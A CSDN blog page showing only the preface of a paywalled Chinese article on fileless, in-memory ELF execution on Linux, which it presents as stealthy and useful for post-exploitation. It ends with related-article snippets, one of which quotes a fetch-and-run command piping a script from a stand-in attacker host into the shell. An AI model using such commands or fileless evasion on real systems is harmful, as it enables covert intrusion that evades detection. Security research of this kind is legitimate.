linux系统内存执行elf的多种方式(内存马)

已于 2022-08-26 09:49:10 修改
阅读量3.1k 收藏 1
点赞数
分类专栏: 渗透常识研究 文章标签: linux 服务器 安全
于 2019-08-13 16:06:52 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u012206617/article/details/99442265
版权
渗透常识研究 专栏收录该内容
179 篇文章 88 订阅 ¥29.90 ¥99.00
订阅专栏
本文探讨了在Linux系统中无文件执行程序的多种方法,包括C语言、Perl、Python、PHP和Shellcode。通过内存执行,避免在磁盘上留下痕迹,提高恶意软件的隐蔽性。文章详细讲解了如何利用系统调用和编程语言在内存中运行ELF文件,以实现无文件执行,这对于后渗透和信息安全研究具有重要意义。
摘要由CSDN通过智能技术生成

一、前言

无文件(fileless)恶意软件攻击现在已经越来越流行,这一点并不奇怪,因为这种技术通常不会留下蛛丝马迹。本文的重点不是介绍如何在Windows RAM中执行程序,我们的目标是GNU/Linux。Linux是服务器行业的领头羊,在上百万嵌入式设备和大多数web服务上都能看到Linux的身影。在本文中,我们将简单探讨如何在Linux系统内存中执行程序,也讨论了如何应付具有挑战性的环境。

无文件执行比较隐蔽,比较难检测及跟踪。由于该过程中不涉及新文件写入磁盘,也没有修改已有文件,因此基于文件系统一致性的检测工具通常不会警告管理员。反病毒软件(*nix用户通常会忽略这种产品)在程序启动后通常不会监控程序内存。其外,当系统安装完毕后,许多GNU/Linux发行版会提供各种调试工具、解释程序、编译器和程序库,这些都可以帮助我们实现无文件技术隐蔽执行。然而,无文件执行也有一些缺点,比如无法在系统意外断电或者重启时正常驻留,但程序正常情况下可以保持运行,直到目标设备断电下线。

无文件技术可以用来传播恶意软件,但功能并不局限于此。如果我们对运行速度要求较高,可以将程序拷贝到内存中运行。许多Linux发行版可以完全在内存中运行,因此在搭载硬盘驱动器的情况下,我们还是有可能实现不落盘运行。对于信息安全而言,无文件技术在后渗透(post-exploi

了解本专栏 订阅专栏 解锁全文
墨痕诉清风
关注
专栏目录
订阅专栏
Linux-ELF文件详解
05-21
很详细的一份针对于elf格式文件的技术文档,对于想更深层次的了解Linux的朋友们相信会有很大帮助的
linux系统内存执行elf多种方式
whatday的专栏
08-13 1810
一、前言 无文件(fileless)恶意软件攻击现在已经越来越流行,这一点并不奇怪,因为这种技术通常不会留下蛛丝迹。本文的重点不是介绍如何在Windows RAM中执行程序,我们的目标是GNU/LinuxLinux服务器行业的领头羊,在上百万嵌入式设备和大多数web服务上都能看到Linux的身影。在本文中,我们将简单探讨如何在Linux系统内存执行程序,也讨论了如何应付具有挑战性的环境。...
内存检测排查手段_内存查杀
最新发布
2401_84215240的博客
07-22 1654
内存是无文件落地webshell中最常见的攻击手段,随着攻防演练对抗强度越来越高,流量分析、EDR等专业安全设备被蓝方广泛使用,传统的文件上传的webshll以及文件形式的后门容易被检测到,文件shell明显气数已尽,而内存因其隐蔽性等优点从而越来越盛行。
Linux ELF文件装入与执行概述
余璜的技术博客
12-28 9022
ELFlinux中使用最广泛的一种应用程序格式,为了弄清楚Linux内核是如何讲ELF文件精确映射到指定内存空间,上周末把内核sys_execve部分好好看了一遍,小结如下:1. ELF格式ELF指定了进程中text段、bss段、data段等应该放置到进程虚拟内存空间的什么位置,以及记录了进程需要用到的各种动态链接库的位置。2. sys_execve的大致执行流程
Linux执行文件 ELF结构 及程序载入执行
weixin_34362991的博客
03-14 180
    LinuxELF文件类型分为以下几种:    1、可重定位文件,比如SimpleSection.o;    2、可运行文件,比如/bin/bash。    3、共享目标文件,比如/lib/libc.so。    在Linux 可重定位文件 ELF结构一文中,我们已经分析了可重定位文件ELF结构。本文分析可运行文件ELF结构。    首先附上源码:    SectionMapping...
Linux GCC常用命令和ELF文件格式
weixin_56102526的博客
10-15 729
Linux GCC常用命令和EFF文件格式一、各种工具(一)GCC编译工具(二)Binutils(三)C 运行库一、 C 语言程序 Hello.c示例(一)准备工作(二)编译过程1.预处理2.编译3.汇编4.链接(三)分析 ELF 文件1.ELF 文件的段 一、各种工具 (一)GCC编译工具 GCC(GNU C Compiler)是编译工具。本文所要介绍的将 C/C++语言编写的程序 转换成为处理器能够执行的二进制代码的过程即由编译器完成 (二)Binutils 一组二进制程序处理工具,包括:addr2
linux系统下程序的执行方式,Linux系统ELF程序的执行过程
weixin_31366459的博客
04-30 1022
本文将介绍linux程序的执行过程,并以实际问题为切入点简单介绍下ELF程序的加载过程。【正文】用后态执行我们知道在linux系统中可以通过诸如"./debug"方式执行一个程序,那么这个程序的执行过程中linux系统都做了什么?本文以debug程序为例,介绍linux内核是如何一步步将debug进程执行起来的.1 执行过程:以system()实现为例,它是一种典型的可执行程序运行过程:[cpp]...
linux如何调试elf程序,LinuxELF执行过程
weixin_32662187的博客
05-01 1259
我们考虑从shell中执行一个Linux应用程序,并且该应用程序链接的是动态库,而不是静态库1. 加载二进制文件shell会执行evecve()进行系统调用,如下所示 execve() -> do_sys_execve() -> do_execve() –> do_execve_common()这里先介绍内核的两个数据结构~ struct linux_binfmt: 用来支持多...
Linux elf执行文件加密
04-21 3889
ELF 全称 “Executable and Linkable Format”,即可执行可链接文件格式,目前常见的Linux、 Android可执行文件、共享库(.so)、目标文件( .o)以及Core 文件(吐核)均为此格式。 那么如何对elf文件进行加密呢?这里推荐一款代码加密工具:Virbox Protector。直接将elf文件直接拖到Virbox Protector加密工具里,选择函数...
gcc_arm-linux-gcc_arm-elf-gcc.rar_arm linux gcc_arm-elf-gcc_elf_
09-22
标题中的“gcc_arm-linux-gcc_arm-elf-gcc.rar”提到了一个压缩包文件,它包含的PDF文档可能详细阐述了关于GCC(GNU Compiler Collection)在不同环境下的应用,特别是针对ARM架构的Linux系统和ARM-ELF目标平台。...
linuxelf手册
09-26
linuxelf中文手册!
linux文件渗透执行elf
whatday的专栏
08-13 1287
01—简介 在进行Linux系统的攻击应急时,大家可能会查看pid以及/proc相关信息,比如通过/proc/$pid/cmdline查看某个可疑进程的启动命令,通过/proc/$pid/exe抓样本等,但是攻击者是否会通过某种类似于curl http://attacker.com/1.sh | sh的方法来执行elf二进制文件呢?最近看了一篇@MagisterQuis写的文章h...
Linux执行elf执行文件流程
新时代农民工
07-05 634
execve族系统调用用于运行一个新的进程,并且替换当前进程的内存映像(代码,数据,栈)为新进程的内存映像。这个系统调用会在指定的进程空间内加载一个新的程序,同时将参数和环境变量传递给新程序。execve族的调用可以让用户免于开发自己的shell或者cli程序,用现有的程序交互式地对系统进行操作,甚至可以在shell中启动其他进程。由以上代码可知,execve族系统调用主要是通过elf加载器解释加载到内存,再通过修改arm的pc sp指针,使得该elf执行文件得以运行。
linux怎么运行elf文件,Linux 查看 elf执行文件格式的两个命令
weixin_29266749的博客
04-28 4462
使用objdump 和readelf 两个命令,我们可以看到elf的各个节段的 信息还有 运行时需要那些动态链接库,elf中的汇编代码等等。 我就是想用来查看 这个elf运行需要哪些 *.so 文件#includeint test(){return 0;}int main(void){int i;int j =0;//printf ("sizeof (int)=%d\n",sizeof (int)...
Linux系统ELF执行文件的装载与执行
你是谁的博客
06-19 929
本文内容参考自《程序员的自我修养——链接、装载与库》
Linux】—elf文件的加载
王磊明的博客
06-08 1184
但是内存信息的排布,并不是唯一的,其内容地址可变。Section Header Table 描述了所有节信息表,而 Program Header Table 其实描述的是所有的 段信息表。此时,在ELF文件头中就会有一项PT_INTERP,记录了程序的解释器路径。load_elf_binary,主要负责对可执行文件elf文件读取,并提前做好相关的内存布局。找到段信息中为栈类型的,根据其标志,来调整相关标志变量。对进行的段、堆、代码段、数据段地址进行设置。根据loc中信息,确定解释器的类型。
Linux下的ELF文件、链接、加载与库(含大量图文解析及例程)
热门推荐
weixin_44966641的博客
10-06 1万+
Linux下的ELF文件、链接、加载与库 链接是将将各种代码和数据片段收集并组合为一个单一文件的过程,这个文件可以被加载到内存执行。链接可以执行与编译时,也就是在源代码被翻译成机器代码时;也可以执行于加载时,也就是被加载器加载到内存执行时;甚至执行于运行时,也就是由应用程序来执行。 ​ — CSAPP 本文主要参考[原创] Linux环境下:程序的链接, 装载和库,[完结] 2020 南京大学
Linux ELF执行链接格式学习
洪伟的专栏
11-03 1403
ELF 是一种用于二进制文件、可执行文件、目标代码、共享库和核心转储格式文件的格式。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

墨痕诉清风

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值